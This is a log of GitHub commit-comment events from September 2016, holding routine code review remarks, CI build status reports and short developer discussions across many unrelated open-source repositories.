{"id":"4541946123","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18968341,"position":null,"line":null,"path":null,"commit_id":"e195ceaf6ecc9ffc4bf0c3671eddf95b8ac8aa58","created_at":"2016-09-09T19:31:01Z","updated_at":"2016-09-09T19:31:01Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e195ceaf6ecc9ffc4bf0c3671eddf95b8ac8aa58-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e195ceaf6ecc9ffc4bf0c3671eddf95b8ac8aa58-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T19:31:01Z"}
{"id":"4541954978","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18968362,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T19:32:59Z","updated_at":"2016-09-09T19:32:59Z","body":"No, simply no! All those strings are non existing. Those strings are from patches: https://github.com/ghsr/build_tools/blob/cm-13.0/patches/packages_services_Telephony.patch\r\nThings doesn't just work with copy paste. These strings are from inbuilt cm system, tell me one good reason i would change it. (Except that translation stuff that is totally pointless for me). There is no need to patch everything if thing works even without that."}},"created_at":"2016-09-09T19:32:59Z"}
{"id":"4541956681","type":"CommitCommentEvent","actor":{"login":"jacobzlogar"},"repo":{"name":"syrup-io/syrup"},"payload":{"comment":{"id":18968365,"position":null,"line":null,"path":null,"commit_id":"c5535746429843909dda44e7e67fcdd600677d31","created_at":"2016-09-09T19:33:17Z","updated_at":"2016-09-09T19:33:17Z","body":"reconfigure semantic, using the wrong @fontpath. created the new directory for now"}},"created_at":"2016-09-09T19:33:17Z"}
{"id":"4541957026","type":"CommitCommentEvent","actor":{"login":"mhhf"},"repo":{"name":"nexusdev/dapple-core"},"payload":{"comment":{"id":18968369,"position":null,"line":null,"path":null,"commit_id":"6e42006958eb9af8f45df91a5460ea07ad04f930","created_at":"2016-09-09T19:33:22Z","updated_at":"2016-09-09T19:33:22Z","body":"We had several integer overflows after working with large numbers, but i miss base 10 myself.\r\nI think the best way is to go with a logic which displays hex in case it would be an overflow and base 10 otherwise."}},"created_at":"2016-09-09T19:33:22Z"}
{"id":"4541963425","type":"CommitCommentEvent","actor":{"login":"mhhf"},"repo":{"name":"nexusdev/dapple-core"},"payload":{"comment":{"id":18968390,"position":null,"line":null,"path":null,"commit_id":"6e42006958eb9af8f45df91a5460ea07ad04f930","created_at":"2016-09-09T19:34:42Z","updated_at":"2016-09-09T19:34:42Z","body":"Honestly I dunno why we went with base 16, will revert this. Thanks"}},"created_at":"2016-09-09T19:34:42Z"}
{"id":"4541965356","type":"CommitCommentEvent","actor":{"login":"lattner"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18968396,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-09T19:35:06Z","updated_at":"2016-09-09T19:35:06Z","body":"Awesome John!"}},"created_at":"2016-09-09T19:35:06Z"}
{"id":"4541972228","type":"CommitCommentEvent","actor":{"login":"jrhorrocks"},"repo":{"name":"BT-1/fit"},"payload":{"comment":{"id":18968416,"position":20,"line":20,"path":"src/test/groovy/org/bt-1/HelloControllerSpec.groovy","commit_id":"93fb8cca1ccb32186abeea825ad9ed114bc9ae21","created_at":"2016-09-09T19:36:32Z","updated_at":"2016-09-09T19:36:32Z","body":"What the hell!?"}},"created_at":"2016-09-09T19:36:32Z"}
{"id":"4541973748","type":"CommitCommentEvent","actor":{"login":"jrhorrocks"},"repo":{"name":"BT-1/fit"},"payload":{"comment":{"id":18968421,"position":20,"line":20,"path":"src/test/groovy/org/bt-1/HelloControllerSpec.groovy","commit_id":"93fb8cca1ccb32186abeea825ad9ed114bc9ae21","created_at":"2016-09-09T19:36:53Z","updated_at":"2016-09-09T19:36:53Z","body":"sorry"}},"created_at":"2016-09-09T19:36:53Z"}
{"id":"4541976045","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18968431,"position":null,"line":null,"path":null,"commit_id":"e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966","created_at":"2016-09-09T19:37:22Z","updated_at":"2016-09-09T19:37:22Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T19:37:22Z"}
{"id":"4541979169","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18968447,"position":7,"line":1490,"path":"docs/guide-ru/db-active-record.md","commit_id":"2250612cb861947c3fcaab91f0d60d116978a88e","created_at":"2016-09-09T19:38:02Z","updated_at":"2016-09-09T19:38:02Z","body":"`'select'` -> <code>\\`select\\`</code>"}},"created_at":"2016-09-09T19:38:02Z"}
{"id":"4541979138","type":"CommitCommentEvent","actor":{"login":"DQvsRA"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":18968448,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-09T19:38:03Z","updated_at":"2016-09-09T19:38:03Z","body":"Why you do not use const, as i know it is more effecient memory usage?"}},"created_at":"2016-09-09T19:38:03Z"}
{"id":"4541984949","type":"CommitCommentEvent","actor":{"login":"Firehawke"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18968466,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T19:39:21Z","updated_at":"2016-09-09T19:39:21Z","body":"Seems reasonable to me. This is going to require discipline on the part of\npeople adding sets, but that IS what we have the board for-- if someone\nneeds to be trout-slapped for misuse, it can be done in relatively short\norder.\n\nOn Fri, Sep 9, 2016 at 10:32 AM, R. Belmont <notifications@github.com>\nwrote:\n\n> Haze: we already put down strict rules about this. Renaming existing sets\n> isn't going to happen, and for future sets using all the letters for the\n> sake of it will not pass either. This is just about sets where a few more\n> letters would make an unreadable Eastern European-looking mess into\n> something people can remember and type.\n>\n> (There's a proposal to rename the Nintendo VS sets to all have a\n> consistent \"nvs_\" prefix, which this would certainly help with, but that's\n> not guaranteed to happen).\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff#commitcomment-18966527>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AI5mX4lFbAcl6BAx8JTMP0DRekPCDJdGks5qoZgVgaJpZM4J49Ta>\n> .\n>\n"}},"created_at":"2016-09-09T19:39:21Z"}
{"id":"4541992775","type":"CommitCommentEvent","actor":{"login":"DQvsRA"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":18968494,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-09T19:41:08Z","updated_at":"2016-09-09T19:41:08Z","body":"And why you referencing the same property twice, as i know it is better to create a const for that, or not? Does compiler create single temp variable for his reference or it will two?"}},"created_at":"2016-09-09T19:41:08Z"}
{"id":"4541993590","type":"CommitCommentEvent","actor":{"login":"maicol289"},"repo":{"name":"carlosbalamba/MIKEBOL"},"payload":{"comment":{"id":18968496,"position":null,"line":null,"path":null,"commit_id":"b609a9ac9fe48605bd793ce75b5467562901beea","created_at":"2016-09-09T19:41:18Z","updated_at":"2016-09-09T19:41:18Z","body":"Modificación viabilidad financiera de nuestro proyecto\r\n[VIABILIDAD DE COSTOS.docx](https://github.com/carlosbalamba/MIKEBOL/files/464686/VIABILIDAD.DE.COSTOS.docx)\r\n\r\n"}},"created_at":"2016-09-09T19:41:18Z"}
{"id":"4541995950","type":"CommitCommentEvent","actor":{"login":"rohankharwar"},"repo":{"name":"rohankharwar/neo4j-apoc-procedures"},"payload":{"comment":{"id":18968507,"position":null,"line":null,"path":null,"commit_id":"04710e44e7c367ce25b006f9fea2ae9aa476519f","created_at":"2016-09-09T19:41:49Z","updated_at":"2016-09-09T19:41:49Z","body":"Adding the images for manual-index.adoc"}},"created_at":"2016-09-09T19:41:49Z"}
{"id":"4541996820","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18968511,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T19:41:57Z","updated_at":"2016-09-09T19:41:57Z","body":"Change \"WCDMA Only\" to \"WCDMA\", \"WCDMA/GSM preferred\" to \"GSM/WCDMA\" and \"GSM only\" to \"GSM\" (I'll close this discussion when you'll do this change)"}},"created_at":"2016-09-09T19:41:57Z"}
{"id":"4541997041","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18968512,"position":null,"line":null,"path":null,"commit_id":"75f60f69416625713819c810d2da33db4dc0b06c","created_at":"2016-09-09T19:41:59Z","updated_at":"2016-09-09T19:41:59Z","body":"👍 "}},"created_at":"2016-09-09T19:41:59Z"}
{"id":"4542002084","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18968520,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T19:43:03Z","updated_at":"2016-09-09T19:43:03Z","body":"Offtopic:\r\nBy the way, could you add performance profiles?"}},"created_at":"2016-09-09T19:43:03Z"}
{"id":"4542003357","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18968523,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T19:43:19Z","updated_at":"2016-09-09T19:43:19Z","body":"*could=can"}},"created_at":"2016-09-09T19:43:19Z"}
{"id":"4542004923","type":"CommitCommentEvent","actor":{"login":"supasate"},"repo":{"name":"youpin-city/youpin-bot"},"payload":{"comment":{"id":18968530,"position":14,"line":14,"path":"Dockerfile","commit_id":"1943f3ec2063893f9e3a165f640ad9ea6a9d5d5e","created_at":"2016-09-09T19:43:39Z","updated_at":"2016-09-09T19:43:39Z","body":"I agree."}},"created_at":"2016-09-09T19:43:39Z"}
{"id":"4542007072","type":"CommitCommentEvent","actor":{"login":"thomasdalbert"},"repo":{"name":"thomasdalbert/GraphPathFinder"},"payload":{"comment":{"id":18968535,"position":32,"line":30,"path":"src/main/java/client/controller/GraphFileGenerator.java","commit_id":"a4cd94d65617a6e9b467309fdb0aeace4cac1870","created_at":"2016-09-09T19:44:10Z","updated_at":"2016-09-09T19:44:10Z","body":"Use values from .properties file (there is a DAO fort that). Avoid hard strings when possible. \r\nSale thing gor line 32."}},"created_at":"2016-09-09T19:44:10Z"}
{"id":"4542011339","type":"CommitCommentEvent","actor":{"login":"fjarrett"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18968548,"position":6,"line":19,"path":"includes/Config/i18nFrontEnd.php","commit_id":"a1b780981ed74ee5d8863923fa39cc6ebce0ecb8","created_at":"2016-09-09T19:45:08Z","updated_at":"2016-09-09T19:45:08Z","body":"@kjohnson Not sure where exactly the breakdown happened, but the localization for this string was done as [\"with an\"](https://github.com/wpninjas/ninja-forms/blob/201b4bcb7badeed8e65641a96bc3357436411462/lang/ninja-forms-ja.po#L29) not \"with a\". It's affecting display in all languages.\r\n\r\n<img width=\"298\" alt=\"screen shot 2016-09-09 at 2 42 18 pm\" src=\"https://cloud.githubusercontent.com/assets/522158/18400490/c3b6acac-769b-11e6-873d-a5d56bc53c22.png\">\r\n"}},"created_at":"2016-09-09T19:45:08Z"}
{"id":"4542013149","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18968555,"position":null,"line":null,"path":null,"commit_id":"4ccf543e00b4fa279063abbd6b99fc0ee669b73c","created_at":"2016-09-09T19:45:32Z","updated_at":"2016-09-09T19:45:32Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ccf543e00b4fa279063abbd6b99fc0ee669b73c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4ccf543e00b4fa279063abbd6b99fc0ee669b73c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T19:45:32Z"}
{"id":"4542017090","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18968567,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T19:46:25Z","updated_at":"2016-09-09T19:46:25Z","body":"No, I won't change until I found a good reason for it.\r\nAnd,performance profiles is already ported by me, it's even working fine(just need some fine tuning of freqs) \r\n@19ba5323"}},"created_at":"2016-09-09T19:46:25Z"}
{"id":"4542018544","type":"CommitCommentEvent","actor":{"login":"saaguero"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":18968569,"position":37,"line":20,"path":"tests/utils.vader","commit_id":"2c7a28d01cb0bdf8602680314b9f0b8c10bf9f07","created_at":"2016-09-09T19:46:45Z","updated_at":"2016-09-09T19:46:45Z","body":"Now that you say, the expression must also expand that thing \"\\%..\" since expand function handles the escape char and hence outputs a literal '%..'. I would make the changes and add a corresponding test."}},"created_at":"2016-09-09T19:46:45Z"}
{"id":"4542021138","type":"CommitCommentEvent","actor":{"login":"erasche"},"repo":{"name":"chapmanb/bcbb"},"payload":{"comment":{"id":18968574,"position":null,"line":null,"path":null,"commit_id":"7cc2de87c8eebe0772280a82379ebc73c64a5cc7","created_at":"2016-09-09T19:47:14Z","updated_at":"2016-09-09T19:47:14Z","body":"Thank you @chapmanb "}},"created_at":"2016-09-09T19:47:14Z"}
{"id":"4542021765","type":"CommitCommentEvent","actor":{"login":"mflavin"},"repo":{"name":"mflavin/Project-1"},"payload":{"comment":{"id":18968577,"position":null,"line":null,"path":null,"commit_id":"73ae60a27a555c82220982cb28e5e3af8c502554","created_at":"2016-09-09T19:47:22Z","updated_at":"2016-09-09T19:47:22Z","body":"Added Education"}},"created_at":"2016-09-09T19:47:22Z"}
{"id":"4542023960","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18968585,"position":null,"line":null,"path":null,"commit_id":"e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966","created_at":"2016-09-09T19:47:49Z","updated_at":"2016-09-09T19:47:49Z","body":"test_build_branch (lefticus) - Win64-Windows-7-VisualStudio-12: Tests Failed (1537 of 2048 tests passed, 37 test warnings)\n\n * 538 tests had: AUD diffs.\n * 529 tests had: EIO diffs.\n * 422 tests had: ESO small diffs.\n * 511 tests had: RDD diffs.\n * 496 tests had: Table big diffs.\n * 85 tests had: ERR diffs.\n * 115 tests had: ESO big diffs.\n * 419 tests had: BND diffs.\n * 359 tests had: MTR small diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 29 tests had: DXF diffs.\n * 5 tests had: ZSZ big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.05%25-red.svg)</a> \n"}},"created_at":"2016-09-09T19:47:49Z"}
{"id":"4542025075","type":"CommitCommentEvent","actor":{"login":"matias09"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18968588,"position":11,"line":11,"path":"Tetris/InputHandlerFactory.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T19:48:03Z","updated_at":"2016-09-09T19:48:03Z","body":"Voy a eliminar el puntero cuando se ejecute el destructor del GameFlow en el que me encuentre.  No esta hecho todavia, pero lo tengo en cuenta.\r\n\r\nDe todas maneras lo voy a cambiar, Voy a hacer que el GameController tenga las instancias de los Handlers que voy a utilizar. Porque teoricamente, no van a cambiar durante todo el juego, se los voy a pasar por Referencia a los GameModes y cuando se ejecute el Destructor del GameController, libero Memoria.\r\n\r\nPido disculpas por las respuestas que puse antes sobre este tema. No habia leido bien tu comentario."}},"created_at":"2016-09-09T19:48:03Z"}
{"id":"4542027048","type":"CommitCommentEvent","actor":{"login":"DeepakRajendranMsft"},"repo":{"name":"skomarag/azure-rest-api-specs"},"payload":{"comment":{"id":18968594,"position":6,"line":6536,"path":"arm-network/2016-09-01/swagger/network.json","commit_id":"965254dc73c0a7aec280b7d23a6deb7d05e65af6","created_at":"2016-09-09T19:48:27Z","updated_at":"2016-09-09T19:48:27Z","body":"Gets or sets if  accelerated networking enabled on network interface "}},"created_at":"2016-09-09T19:48:27Z"}
{"id":"4542027171","type":"CommitCommentEvent","actor":{"login":"DeepakRajendranMsft"},"repo":{"name":"skomarag/azure-rest-api-specs"},"payload":{"comment":{"id":18968596,"position":null,"line":null,"path":null,"commit_id":"965254dc73c0a7aec280b7d23a6deb7d05e65af6","created_at":"2016-09-09T19:48:28Z","updated_at":"2016-09-09T19:48:28Z","body":"LGTM\r\n\r\n"}},"created_at":"2016-09-09T19:48:28Z"}
{"id":"4542028468","type":"CommitCommentEvent","actor":{"login":"ja1lbreakr0cks"},"repo":{"name":"ja1lbreakr0cks/repository"},"payload":{"comment":{"id":18968599,"position":null,"line":null,"path":null,"commit_id":"3a1b2087b30a365b41de700672d8a76253ade1a8","created_at":"2016-09-09T19:48:45Z","updated_at":"2016-09-09T19:48:45Z","body":"Person5 edits are a stopgap solution to make sure the files would compile so I could verify the integrity of my gradle build"}},"created_at":"2016-09-09T19:48:45Z"}
{"id":"4542030510","type":"CommitCommentEvent","actor":{"login":"tylers-dev"},"repo":{"name":"A3Armory/A3A_A3Wasteland.Altis"},"payload":{"comment":{"id":18968603,"position":null,"line":null,"path":null,"commit_id":"47e5948d1bc0e99cf26efe99f71145359adeadf4","created_at":"2016-09-09T19:49:11Z","updated_at":"2016-09-09T19:49:11Z","body":"Ok. Well hopefully it makes new players play more to get items that are harder to find. I just think that whenever you increase challenge on an item (time or money), all the regular players still obtain them because they have the time and money, and you place it out of reach for the new players. Some players will just play more and that makes it fun, but it makes that initial hill into the game harder to climb for new players. I don't want new players to feel like they are getting crushed before they have a chance to learn the game."}},"created_at":"2016-09-09T19:49:11Z"}
{"id":"4542030853","type":"CommitCommentEvent","actor":{"login":"Unifsena"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":18968605,"position":null,"line":null,"path":null,"commit_id":"32820b517a41c0a8a5a35c9207ec02ec766d3d8b","created_at":"2016-09-09T19:49:16Z","updated_at":"2016-09-09T19:49:16Z","body":"![mapa](https://cloud.githubusercontent.com/assets/21367982/18400667/33ef0952-76d7-11e6-91b2-8231b3d98786.png)\r\n"}},"created_at":"2016-09-09T19:49:16Z"}
{"id":"4542034017","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18968614,"position":null,"line":null,"path":null,"commit_id":"029890df50d24f26fe0d939f4c97d05cf129290a","created_at":"2016-09-09T19:49:56Z","updated_at":"2016-09-09T19:49:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dXYccezdTG62raHkBQPuEQ"}},"created_at":"2016-09-09T19:49:56Z"}
{"id":"4542034858","type":"CommitCommentEvent","actor":{"login":"thomasdalbert"},"repo":{"name":"thomasdalbert/GraphPathFinder"},"payload":{"comment":{"id":18968615,"position":6,"line":6,"path":"src/main/java/client/model/util/IMathUtil.java","commit_id":"a4cd94d65617a6e9b467309fdb0aeace4cac1870","created_at":"2016-09-09T19:50:08Z","updated_at":"2016-09-09T19:50:08Z","body":"Methods name should almost always begin with a verb (here getRandomNumber)."}},"created_at":"2016-09-09T19:50:08Z"}
{"id":"4542035453","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18968616,"position":11,"line":11,"path":"Tetris/InputHandlerFactory.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T19:50:15Z","updated_at":"2016-09-09T19:50:15Z","body":"Dale! todo bien :)"}},"created_at":"2016-09-09T19:50:15Z"}
{"id":"4542040336","type":"CommitCommentEvent","actor":{"login":"thomasdalbert"},"repo":{"name":"thomasdalbert/GraphPathFinder"},"payload":{"comment":{"id":18968624,"position":8,"line":8,"path":"src/main/java/client/model/util/MathUtil.java","commit_id":"a4cd94d65617a6e9b467309fdb0aeace4cac1870","created_at":"2016-09-09T19:51:16Z","updated_at":"2016-09-09T19:51:16Z","body":"Leaving this method static makes its usées have tout instantiate thé class.\r\n"}},"created_at":"2016-09-09T19:51:16Z"}
{"id":"4542040710","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18968625,"position":22,"line":90,"path":"scripts/album.js","commit_id":"89cf3ad7d5f209e8404bcbe1a10ad8ad10343d51","created_at":"2016-09-09T19:51:22Z","updated_at":"2016-09-09T19:51:22Z","body":"a better name for the argument would be parentClassName, className, or parentClass"}},"created_at":"2016-09-09T19:51:22Z"}
{"id":"4542042940","type":"CommitCommentEvent","actor":{"login":"jessemyers"},"repo":{"name":"globality-corp/microcosm-pubsub"},"payload":{"comment":{"id":18968632,"position":13,"line":64,"path":"microcosm_pubsub/consumer.py","commit_id":"557d284b55709d7fd4856a97acee3c55b5792949","created_at":"2016-09-09T19:51:51Z","updated_at":"2016-09-09T19:51:51Z","body":"No, fixing in a hotfix."}},"created_at":"2016-09-09T19:51:51Z"}
{"id":"4542043250","type":"CommitCommentEvent","actor":{"login":"Unifsena"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":18968634,"position":null,"line":null,"path":null,"commit_id":"32820b517a41c0a8a5a35c9207ec02ec766d3d8b","created_at":"2016-09-09T19:51:55Z","updated_at":"2016-09-09T19:51:55Z","body":"![requerimientos](https://cloud.githubusercontent.com/assets/21367982/18400768/9e1d624c-76d7-11e6-8a45-6a64b72a43a7.PNG)\r\n"}},"created_at":"2016-09-09T19:51:55Z"}
{"id":"4542043269","type":"CommitCommentEvent","actor":{"login":"dallaswinger"},"repo":{"name":"aopp/android_packages_apps_Settings"},"payload":{"comment":{"id":18968635,"position":null,"line":null,"path":null,"commit_id":"7906e85eba7f19809200c8072fa93bb84170315a","created_at":"2016-09-09T19:51:55Z","updated_at":"2016-09-09T19:51:55Z","body":"This relies on a pwnixversion prop value that we will set after installing the chroot with pxinstaller and update as needed at the end of chef runs with setprop\r\n\r\nAlternatively we can check and set at boot with chrootboot but is kinda overkill"}},"created_at":"2016-09-09T19:51:55Z"}
{"id":"4542044657","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18968639,"position":34,"line":98,"path":"scripts/album.js","commit_id":"89cf3ad7d5f209e8404bcbe1a10ad8ad10343d51","created_at":"2016-09-09T19:52:14Z","updated_at":"2016-09-09T19:52:14Z","body":"why do you have nothing in this if statement? just use a !="}},"created_at":"2016-09-09T19:52:14Z"}
{"id":"4542046273","type":"CommitCommentEvent","actor":{"login":"Unifsena"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":18968645,"position":null,"line":null,"path":null,"commit_id":"32820b517a41c0a8a5a35c9207ec02ec766d3d8b","created_at":"2016-09-09T19:52:35Z","updated_at":"2016-09-09T19:52:35Z","body":"[RequisitosFNF.docx](https://github.com/Unifsena/Unifsena/files/464706/RequisitosFNF.docx)\r\n"}},"created_at":"2016-09-09T19:52:35Z"}
{"id":"4542047534","type":"CommitCommentEvent","actor":{"login":"Unifsena"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":18968650,"position":null,"line":null,"path":null,"commit_id":"32820b517a41c0a8a5a35c9207ec02ec766d3d8b","created_at":"2016-09-09T19:52:52Z","updated_at":"2016-09-09T19:52:52Z","body":"[Casos de uso extendido Unifsena.docx](https://github.com/Unifsena/Unifsena/files/464707/Casos.de.uso.extendido.Unifsena.docx)\r\n"}},"created_at":"2016-09-09T19:52:52Z"}
{"id":"4542050470","type":"CommitCommentEvent","actor":{"login":"sebastic"},"repo":{"name":"gwaldron/osgearth"},"payload":{"comment":{"id":18968654,"position":null,"line":null,"path":null,"commit_id":"10b42b791ebc541b547e3a07c0c58cd0f373a2c7","created_at":"2016-09-09T19:53:33Z","updated_at":"2016-09-09T19:53:33Z","body":"FWIW, the patch is no longer required for 2.8~rc{1,2}, so it seems to have been fixed in the mean time."}},"created_at":"2016-09-09T19:53:33Z"}
{"id":"4542052966","type":"CommitCommentEvent","actor":{"login":"wahern"},"repo":{"name":"wahern/cqueues"},"payload":{"comment":{"id":18968657,"position":42,"line":636,"path":"src/thread.c","commit_id":"3d324baa190336ee430bd14c7afd91e304f8bfca","created_at":"2016-09-09T19:54:08Z","updated_at":"2016-09-09T19:54:08Z","body":"The structure is allocated with calloc so all bits are already zero."}},"created_at":"2016-09-09T19:54:08Z"}
{"id":"4542053108","type":"CommitCommentEvent","actor":{"login":"IgnusG"},"repo":{"name":"IgnusG/Angular2.0-WebpackTemplate"},"payload":{"comment":{"id":18968658,"position":4,"line":16,"path":"config/webpack.test.js","commit_id":"101576d912571a6c859cfc3c63a8c35087eeca69","created_at":"2016-09-09T19:54:10Z","updated_at":"2016-09-09T19:54:10Z","body":"This has to be **fixed**. I have to either make a PR to fix this in [webpack/enhanced-resolve](https://github.com/webpack/enhanced-resolve/) or publish [ts-context-loader](https://gist.github.com/IgnusG/da04250adf9e90162692b4982c596c0c) to [npmjs.com](https://www.npmjs.com/). Maybe both..."}},"created_at":"2016-09-09T19:54:10Z"}
{"id":"4542056807","type":"CommitCommentEvent","actor":{"login":"SevenBits"},"repo":{"name":"UNH-Linux-Club/wifi-setup-script"},"payload":{"comment":{"id":18968667,"position":null,"line":null,"path":null,"commit_id":"7fb8aa3fb9c4a6380800c3ba75a1e7ff0d025cab","created_at":"2016-09-09T19:55:00Z","updated_at":"2016-09-09T19:55:00Z","body":"Nice work @jplsek !"}},"created_at":"2016-09-09T19:55:00Z"}
{"id":"4542057916","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18968671,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-09T19:55:14Z","updated_at":"2016-09-09T19:55:14Z","body":"@JoinRajunraftNow,\r\nTHE GOLD INT? WHAT IS THAT?"}},"created_at":"2016-09-09T19:55:14Z"}
{"id":"4542058868","type":"CommitCommentEvent","actor":{"login":"jaydenkieran"},"repo":{"name":"GetRektByMe/Pixie"},"payload":{"comment":{"id":18968675,"position":35,"line":55,"path":"pixie/plugins/info.py","commit_id":"84b86737bcc62e93914859dde8c18f0dcbfc9dfb","created_at":"2016-09-09T19:55:24Z","updated_at":"2016-09-09T19:55:24Z","body":"\"Pixie's current situation\"\r\npixie is dead"}},"created_at":"2016-09-09T19:55:24Z"}
{"id":"4542059287","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18968676,"position":null,"line":null,"path":null,"commit_id":"2794bee88aee15713b7bde1041f842824e80ec31","created_at":"2016-09-09T19:55:28Z","updated_at":"2016-09-09T19:55:28Z","body":"Ah, the amount of gold. Duh."}},"created_at":"2016-09-09T19:55:28Z"}
